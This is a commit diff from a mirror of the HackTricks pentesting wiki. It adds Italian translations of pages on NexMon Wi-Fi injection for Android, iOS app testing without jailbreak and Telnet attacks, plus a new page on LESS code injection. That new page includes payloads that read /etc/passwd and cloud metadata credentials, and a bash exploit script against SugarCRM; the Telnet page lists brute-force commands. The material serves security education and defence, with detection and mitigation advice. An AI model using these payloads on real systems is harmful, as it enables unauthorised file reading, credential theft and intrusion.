maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/generic-methodologies-and-resources/pentesting-wifi/ena

Browse Source
This commit is contained in:
Translator 2025-07-15 10:46:35 +00:00
parent 06020cad87
commit 9ff1d83e7b
6 changed files with 110 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -544,6 +544,7 @@
# 🕸️ Pentesting Web
- [Less Code Injection Ssrf](pentesting-web/less-code-injection-ssrf.md)
- [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
- [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
- [Web Vulns List](pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md)

14
src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
View File

@ -3,11 +3,11 @@
{{#include ../../banners/hacktricks-training.md}}
## Panoramica
La maggior parte dei moderni telefoni Android integra un chipset Wi-Fi Broadcom/Cypress che viene fornito senza modalità monitor 802.11 o capacità di iniezione di frame. Il framework open-source NexMon patcha il firmware proprietario per aggiungere queste funzionalità e le espone tramite una libreria condivisa (`libnexmon.so`) e un helper CLI (`nexutil`). Pre-caricando quella libreria nel driver Wi-Fi stock, un dispositivo rootato può catturare il traffico 802.11 raw e iniettare frame arbitrari, eliminando la necessità di un adattatore USB esterno.
La maggior parte dei moderni telefoni Android integra un chipset Wi-Fi Broadcom/Cypress che viene fornito senza modalità monitor 802.11 o capacità di iniezione di frame. Il framework open-source NexMon patcha il firmware proprietario per aggiungere queste funzionalità e le espone tramite una libreria condivisa (`libnexmon.so`) e un helper CLI (`nexutil`). Pre-caricando quella libreria nel driver Wi-Fi stock, un dispositivo rootato può catturare il traffico 802.11 grezzo e iniettare frame arbitrari, eliminando la necessità di un adattatore USB esterno.
Questa pagina documenta un flusso di lavoro veloce che prende come esempio un Samsung Galaxy S10 completamente patchato (BCM4375B1), utilizzando:
* Modulo NexMon Magisk contenente il firmware patchato + `libnexmon.so`
* Modulo Magisk NexMon contenente il firmware patchato + `libnexmon.so`
* Applicazione Android Hijacker per automatizzare l'attivazione della modalità monitor
* Chroot Kali NetHunter opzionale per eseguire strumenti wireless classici (aircrack-ng, wifite, mdk4 …) direttamente contro l'interfaccia interna
@ -19,15 +19,15 @@ La stessa tecnica si applica a qualsiasi dispositivo che ha una patch NexMon dis
* Dispositivo Android con un chipset Broadcom/Cypress supportato (es. BCM4358/59/43596/4375B1)
* Root con Magisk ≥ 24
* BusyBox (la maggior parte delle ROM/NetHunter lo include già)
* ZIP NexMon Magisk o patch auto-compilata che fornisce:
* ZIP Magisk NexMon o patch auto-compilata che fornisce:
* `/system/lib*/libnexmon.so`
* `/system/xbin/nexutil`
* Hijacker ≥ 1.7 (arm/arm64) https://github.com/chrisk44/Hijacker
* Hijacker ≥ 1.7 (arm/arm64) [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
* (Opzionale) Kali NetHunter o qualsiasi chroot Linux dove intendi eseguire strumenti wireless
---
## Flashing della patch NexMon (Magisk)
## Flashare la patch NexMon (Magisk)
1. Scarica il ZIP per il tuo dispositivo/firmware esatto (esempio: `nexmon-s10.zip`).
2. Apri Magisk -> Moduli -> Installa da memoria -> seleziona il ZIP e riavvia.
Il modulo copia `libnexmon.so` in `/data/adb/modules/<module>/lib*/` e assicura che le etichette SELinux siano corrette.
@ -39,7 +39,7 @@ sha1sum $(which nexutil)
---
## Configurazione di Hijacker
## Configurare Hijacker
Hijacker può attivare automaticamente la modalità monitor prima di eseguire `airodump`, `wifite`, ecc. In **Impostazioni -> Avanzate** aggiungi le seguenti voci (modifica il percorso della libreria se il tuo modulo è diverso):
```
Prefix:
@ -116,7 +116,7 @@ Le prestazioni sul Galaxy S10 sono comparabili a NIC USB esterni (~20 dBm TX, 2-
* `Device or resource busy` assicurati che il **servizio Wi-Fi di Android sia disabilitato** (`svc wifi disable`) prima di abilitare la modalità monitor.
* `nexutil: ioctl(PRIV_MAGIC) failed` la libreria non è pre-caricata; controlla il percorso di `LD_PRELOAD`.
* L'iniezione di frame funziona ma non vengono catturati pacchetti alcune ROM bloccano hard i canali; prova `nexutil -c <channel>` o `iwconfig wlan0 channel <n>`.
* SELinux blocca la libreria imposta il dispositivo su *Permissivo* o correggi il contesto del modulo: `chcon u:object_r:system_lib_file:s0 libnexmon.so`.
* SELinux blocca la libreria imposta il dispositivo su *Permissive* o correggi il contesto del modulo: `chcon u:object_r:system_lib_file:s0 libnexmon.so`.
---

26
src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
View File

@ -8,20 +8,20 @@ Le applicazioni firmate con l'**entitlement `get_task_allow`** consentono alle a
Tuttavia, non è così semplice come estrarre l'IPA, firmarlo nuovamente con l'entitlement e ricaricarlo sul tuo dispositivo. Questo a causa della protezione FairPlay. Quando la firma dell'app cambia, la chiave DRM (Digital Rights Management) è **annullata e l'app non funzionerà**.
Con un vecchio dispositivo jailbroken, è possibile installare l'IPA, **decrittarlo utilizzando il tuo strumento preferito** (come Iridium o frida-ios-dump) e estrarlo di nuovo dal dispositivo. Anche se, se possibile, è consigliato chiedere semplicemente al cliente per l'IPA decrittato.
Con un vecchio dispositivo jailbroken, è possibile installare l'IPA, **decrittarlo utilizzando il tuo strumento preferito** (come Iridium o frida-ios-dump) e estrarlo di nuovo dal dispositivo. Anche se, se possibile, è consigliato chiedere al cliente l'IPA decrittato.
## Ottenere l'IPA decrittato
### Ottienilo da Apple
1. Installa l'app da pentest nell'iPhone
1. Installa l'app da pentestare sull'iPhone
2. Installa e avvia [Apple Configurator](https://apps.apple.com/au/app/apple-configurator/id1037126344?mt=12) sul tuo macos
3. Apri `Terminal` sul tuo Mac e cd a `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`. L'IPA apparirà in questa cartella più tardi.
4. Dovresti vedere il tuo dispositivo iOS. Fai doppio clic su di esso, quindi clicca su Aggiungi + → App dalla barra dei menu in alto.
5. Dopo aver cliccato su Aggiungi, Configurator scaricherà l'IPA da Apple e tenterà di inviarlo al tuo dispositivo. Se hai seguito la mia raccomandazione precedente e hai già installato l'IPA, apparirà un messaggio che ti chiede di reinstallare l'app.
5. Dopo aver cliccato su Aggiungi, Configurator scaricherà l'IPA da Apple e tenterà di installarlo sul tuo dispositivo. Se hai seguito la mia raccomandazione precedente e hai già installato l'IPA, apparirà un messaggio che ti chiede di reinstallare l'app.
6. L'IPA dovrebbe essere scaricato all'interno di `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps` da dove puoi prenderlo.
Controlla [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed) per informazioni più dettagliate su questo processo.
Controlla [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed) per ulteriori informazioni dettagliate su questo processo.
### Decrittazione dell'app
@ -33,7 +33,7 @@ unzip redacted.ipa -d unzipped
```
Controlla il `Info.plist` per la versione minima supportata e se il tuo dispositivo è più vecchio di quella, modifica il valore affinché sia supportato.
Zip di nuovo l'IPA:
Comprimi di nuovo l'IPA:
```bash
cd unzipped
zip -r ../no-min-version.ipa *
@ -47,11 +47,11 @@ Nota che potresti aver bisogno del **tweak AppSync Unified** da Cydia per preven
Una volta installato, puoi utilizzare il **tweak Iridium** da Cydia per ottenere l'IPA decrittografato.
### Patch entitlements & re-sign
### Patch delle autorizzazioni e ri-firma
Per ri-firmare l'applicazione con il diritto `get-task-allow`, ci sono diversi strumenti disponibili come `app-signer`, `codesign` e `iResign`. `app-signer` ha un'interfaccia molto user-friendly che consente di ri-firmare facilmente un file IPA indicando l'IPA da ri-firmare, per **mettere `get-task-allow`** e il certificato e il profilo di provisioning da utilizzare.
Per ri-firmare l'applicazione con l'autorizzazione `get-task-allow`, ci sono diversi strumenti disponibili come `app-signer`, `codesign` e `iResign`. `app-signer` ha un'interfaccia molto user-friendly che consente di ri-firmare facilmente un file IPA indicando l'IPA da ri-firmare, di **mettere `get-task-allow`** e il certificato e il profilo di provisioning da utilizzare.
Per quanto riguarda i certificati e i profili di firma, Apple offre **profili di firma per sviluppatori gratuiti** per tutti gli account tramite Xcode. Basta creare un'app e configurarne uno. Quindi, configura l'**iPhone per fidarsi delle app degli sviluppatori** navigando su `Impostazioni``Privacy e Sicurezza`, e clicca su `Modalità Sviluppatore`.
Per quanto riguarda il certificato e i profili di firma, Apple offre **profili di firma per sviluppatori gratuiti** per tutti gli account tramite Xcode. Basta creare un'app e configurarne uno. Quindi, configura l'**iPhone per fidarsi delle app degli sviluppatori** navigando su `Impostazioni``Privacy e Sicurezza`, e clicca su `Modalità Sviluppatore`.
Con l'IPA ri-firmata, è tempo di installarla nel dispositivo per effettuare il pentesting:
```bash
@ -67,15 +67,15 @@ Dall'iOS 16 Apple ha introdotto la **Modalità Sviluppatore**: qualsiasi binario
2. Naviga su **Impostazioni → Privacy e Sicurezza → Modalità Sviluppatore** e attivala.
3. Il dispositivo si riavvierà; dopo aver inserito il codice di accesso ti verrà chiesto di **Attivare** la Modalità Sviluppatore.
La Modalità Sviluppatore rimane attiva fino a quando non la disabiliti o non ripristini il telefono, quindi questo passaggio deve essere eseguito solo una volta per dispositivo. [La documentazione di Apple](https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device) spiega le implicazioni di sicurezza.
La Modalità Sviluppatore rimane attiva fino a quando non la disabiliti o non ripristini il telefono, quindi questo passaggio deve essere eseguito solo una volta per dispositivo. [La documentazione Apple](https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device) spiega le implicazioni di sicurezza.
### Opzioni moderne di sideloading
Ora ci sono diversi modi maturi per sideloadare e mantenere aggiornate le IPA ri-firmate senza un jailbreak:
Ora ci sono diversi modi maturi per sideloadare e mantenere le IPA ri-firmate aggiornate senza un jailbreak:
| Strumento | Requisiti | Punti di forza | Limitazioni |
|-----------|-----------|----------------|-------------|
| **AltStore 2 / SideStore** | Compagno macOS/Windows/Linux che ri-firma l'IPA ogni 7 giorni con un profilo dev gratuito | Ricarica automatica via Wi-Fi, funziona fino a iOS 17 | Necessita di un computer sulla stessa rete, limite di 3 app imposto da Apple |
| **AltStore 2 / SideStore** | Compagno macOS/Windows/Linux che ri-firma l'IPA ogni 7 giorni con un profilo di sviluppo gratuito | Ricarica automatica via Wi-Fi, funziona fino a iOS 17 | Necessita di un computer sulla stessa rete, limite di 3 app imposto da Apple |
| **TrollStore 1/2** | Dispositivo su iOS 14 15.4.1 vulnerabile al bug CoreTrust | Firma *permanente* (nessun limite di 7 giorni); nessun computer richiesto una volta installato | Non supportato su iOS 15.5+ (bug corretto) |
Per i pentest di routine sulle versioni attuali di iOS, Alt/Side-Store sono solitamente la scelta più pratica.
@ -94,7 +94,7 @@ Recenti versioni di Frida (>=16) gestiscono automaticamente l'autenticazione dei
### Analisi dinamica automatizzata con MobSF (senza jailbreak)
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) può strumentare un IPA firmato da sviluppatore su un dispositivo reale utilizzando la stessa tecnica (`get_task_allow`) e fornisce un'interfaccia web con browser di filesystem, cattura del traffico e console Frida【†L2-L3】. Il modo più veloce è eseguire MobSF in Docker e poi collegare il tuo iPhone tramite USB:
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) può strumentare un IPA firmato dallo sviluppatore su un dispositivo reale utilizzando la stessa tecnica (`get_task_allow`) e fornisce un'interfaccia web con browser di filesystem, cattura del traffico e console Frida【】. Il modo più veloce è eseguire MobSF in Docker e poi collegare il tuo iPhone tramite USB:
```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest
docker run -p 8000:8000 --privileged \
@ -107,7 +107,7 @@ MobSF distribuirà automaticamente il binario, abiliterà un server Frida all'in
### iOS 17 & avvertenze sulla modalità Lockdown
* **Modalità Lockdown** (Impostazioni → Privacy e Sicurezza) blocca il linker dinamico dal caricare librerie dinamiche non firmate o firmate esternamente. Quando si testano dispositivi che potrebbero avere questa modalità abilitata, assicurati che sia **disabilitata** o le tue sessioni Frida/objection termineranno immediatamente.
* L'Autenticazione del Puntatore (PAC) è applicata a livello di sistema sui dispositivi A12+. Frida ≥16 gestisce in modo trasparente la rimozione del PAC: basta mantenere aggiornati sia *frida-server* che la toolchain Python/CLI quando viene rilasciata una nuova versione principale di iOS.
* L'Autenticazione dei Puntatori (PAC) è applicata a livello di sistema sui dispositivi A12+. Frida ≥16 gestisce in modo trasparente la rimozione del PAC: basta mantenere aggiornati sia *frida-server* che la toolchain Python/CLI quando viene rilasciata una nuova versione principale di iOS.
## Riferimenti

16
src/network-services-pentesting/pentesting-telnet.md
View File

@ -3,7 +3,7 @@
{{#include ../banners/hacktricks-training.md}}
## **Informazioni di base**
## **Informazioni di Base**
Telnet è un protocollo di rete che offre agli utenti un modo NON sicuro per accedere a un computer tramite una rete.
@ -23,7 +23,7 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
Lo script `telnet-ntlm-info.nse` otterrà informazioni NTLM (versioni di Windows).
Dalla [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): Nel protocollo TELNET ci sono varie "**opzioni**" che saranno sanzionate e possono essere utilizzate con la struttura "**DO, DON'T, WILL, WON'T**" per consentire a un utente e a un server di concordare l'uso di un insieme di convenzioni più elaborate (o forse semplicemente diverse) per la loro connessione TELNET. Tali opzioni potrebbero includere la modifica del set di caratteri, la modalità di eco, ecc.
Dalla [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): Nel Protocollo TELNET ci sono varie "**opzioni**" che saranno sanzionate e possono essere utilizzate con la struttura "**DO, DON'T, WILL, WON'T**" per consentire a un utente e a un server di concordare l'uso di un insieme di convenzioni più elaborate (o forse semplicemente diverse) per la loro connessione TELNET. Tali opzioni potrebbero includere la modifica del set di caratteri, la modalità di eco, ecc.
**So che è possibile enumerare queste opzioni, ma non so come, quindi fammi sapere se sai come.**
@ -70,10 +70,10 @@ Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOS
### Recent Vulnerabilities (2022-2025)
* **CVE-2024-45698 D-Link Wi-Fi 6 routers (DIR-X4860)**: Il servizio Telnet integrato accettava credenziali hard-coded e non riusciva a sanitizzare l'input, consentendo RCE remota non autenticata come root tramite comandi creati su porta 23. Risolto nel firmware ≥ 1.04B05.
* **CVE-2023-40478 NETGEAR RAX30**: Un overflow del buffer basato su stack nel comando `passwd` della CLI Telnet consente a un attaccante adiacente di bypassare l'autenticazione ed eseguire codice arbitrario come root.
* **CVE-2022-39028 GNU inetutils telnetd**: Una sequenza di due byte (`0xff 0xf7` / `0xff 0xf8`) attiva un dereferenziamento di puntatore NULL che può far crashare `telnetd`, risultando in un DoS persistente dopo diversi crash.
* **CVE-2023-40478 NETGEAR RAX30**: Overflow del buffer basato su stack nel comando `passwd` della CLI Telnet consente a un attaccante adiacente di bypassare l'autenticazione ed eseguire codice arbitrario come root.
* **CVE-2022-39028 GNU inetutils telnetd**: Una sequenza di due byte (`0xff 0xf7` / `0xff 0xf8`) attiva un dereference di puntatore NULL che può far crashare `telnetd`, risultando in un DoS persistente dopo diversi crash.
Tieni a mente questi CVE durante la triage delle vulnerabilità—se il target sta eseguendo un firmware non patchato o un demone Telnet inetutils legacy potresti avere un percorso diretto per l'esecuzione di codice o un DoS dirompente.
Tieni a mente questi CVE durante la triage delle vulnerabilità—se il target sta eseguendo un firmware non patchato o un daemon Telnet inetutils legacy potresti avere un percorso diretto per l'esecuzione di codice o un DoS dirompente.
### Sniffing Credentials & Man-in-the-Middle
@ -98,7 +98,7 @@ ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f
```
La maggior parte delle botnet IoT (varianti di Mirai) scansiona ancora la porta 23 con piccoli dizionari di credenziali predefiniti—rispecchiare questa logica può identificare rapidamente dispositivi deboli.
La maggior parte delle botnet IoT (varianti di Mirai) scansiona ancora la porta 23 con piccoli dizionari di credenziali predefiniti—rispecchiare quella logica può identificare rapidamente dispositivi deboli.
### Sfruttamento & Post-Sfruttamento
@ -116,11 +116,11 @@ Dopo aver ottenuto una shell, ricorda che **TTY sono solitamente stupidi**; aggi
1. Preferisci SSH e disabilita completamente il servizio Telnet.
2. Se Telnet è necessario, collegalo solo a VLAN di gestione, applica ACL e avvolgi il demone con TCP wrappers (`/etc/hosts.allow`).
3. Sostituisci le implementazioni legacy di `telnetd` con `ssl-telnet` o `telnetd-ssl` per aggiungere crittografia del trasporto, ma **questo protegge solo i dati in transito—indovinare le password rimane banale**.
4. Monitora il traffico in uscita sulla porta 23; le compromissioni spesso generano shell inverse su Telnet per bypassare filtri egressi HTTP rigorosi.
4. Monitora il traffico in uscita verso la porta 23; le compromissioni spesso generano reverse shell su Telnet per bypassare filtri egressi HTTP rigorosi.
## Riferimenti
* D-Link Advisory CVE-2024-45698 RCE Telnet Critico.
* NVD CVE-2022-39028 inetutils `telnetd` DoS.
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

75
src/pentesting-web/less-code-injection-ssrf.md Normal file
View File

@ -0,0 +1,75 @@
# LESS Code Injection leading to SSRF & Local File Read
{{#include ../banners/hacktricks-training.md}}
## Panoramica
LESS è un popolare pre-processore CSS che aggiunge variabili, mixin, funzioni e la potente direttiva `@import`. Durante la compilazione, il motore LESS **recupera le risorse indicate nelle dichiarazioni `@import`** e incorpora ("inline") i loro contenuti nel CSS risultante quando viene utilizzata l'opzione `(inline)`.
Quando un'applicazione concatena **input controllato dall'utente** in una stringa che viene successivamente analizzata dal compilatore LESS, un attaccante può **iniettare codice LESS arbitrario**. Abusando di `@import (inline)`, l'attaccante può costringere il server a recuperare:
* File locali tramite il protocollo `file://` (divulgazione di informazioni / Inclusione di file locali).
* Risorse remote su reti interne o servizi di metadati cloud (SSRF).
Questa tecnica è stata vista in prodotti reali come **SugarCRM ≤ 14.0.0** (endpoint `/rest/v10/css/preview`).
## Sfruttamento
1. Identificare un parametro che è direttamente incorporato all'interno di una stringa di foglio di stile elaborata dal motore LESS (ad es. `?lm=` in SugarCRM).
2. Chiudere l'attuale dichiarazione e iniettare nuove direttive. I primitivi più comuni sono:
* `;` termina la dichiarazione precedente.
* `}` chiude il blocco precedente (se necessario).
3. Utilizzare `@import (inline) '<URL>';` per leggere risorse arbitrarie.
4. Facoltativamente iniettare un **marcatore** (`data:` URI) dopo l'importazione per facilitare l'estrazione del contenuto recuperato dal CSS compilato.
### Lettura di file locali
```
1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //
```
Il contenuto di `/etc/passwd` apparirà nella risposta HTTP poco prima del marcatore `@@END@@`.
### SSRF Cloud Metadata
```
1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //
```
### PoC automatizzato (esempio SugarCRM)
```bash
#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
TARGET="$1" # Base URL of SugarCRM instance
RESOURCE="$2" # file:// path or URL to fetch
INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'
```
## Rilevamento
* Cerca risposte `.less` o `.css` generate dinamicamente contenenti parametri di query non sanitizzati.
* Durante la revisione del codice, cerca costruzioni come `"@media all { .preview { ... ${userInput} ... } }"` passate alle funzioni di rendering LESS.
* I tentativi di sfruttamento spesso includono `@import`, `(inline)`, `file://`, `http://169.254.169.254`, ecc.
## Mitigazioni
* Non passare dati non attendibili al compilatore LESS.
* Se sono necessari valori dinamici, **escapa**/sanitizza correttamente (ad es., limita a token numerici, liste bianche).
* Disabilita, quando possibile, la possibilità di utilizzare importazioni `(inline)`, o limita i protocolli consentiti a `https`.
* Mantieni le dipendenze aggiornate SugarCRM ha corretto questo problema nelle versioni 13.0.4 e 14.0.1.
## Casi del Mondo Reale
| Prodotto | Endpoint Vulnerabile | Impatto |
|----------|----------------------|---------|
| SugarCRM ≤ 14.0.0 | `/rest/v10/css/preview?lm=` | SSRF non autenticato e lettura di file locali |
## Riferimenti
* [SugarCRM ≤ 14.0.0 (css/preview) Vulnerabilità di Iniezione di Codice LESS](https://karmainsecurity.com/KIS-2025-04)
* [Avviso di Sicurezza SugarCRM SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
{{#include ../banners/hacktricks-training.md}}

6
src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
View File

@ -4,4 +4,10 @@
Controlla **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**
- SugarCRM ≤ 14.0.0 L'iniezione LESS `@import` in `/rest/v10/css/preview` consente SSRF non autenticato e lettura di file locali.
{{#ref}}
../less-code-injection-ssrf.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}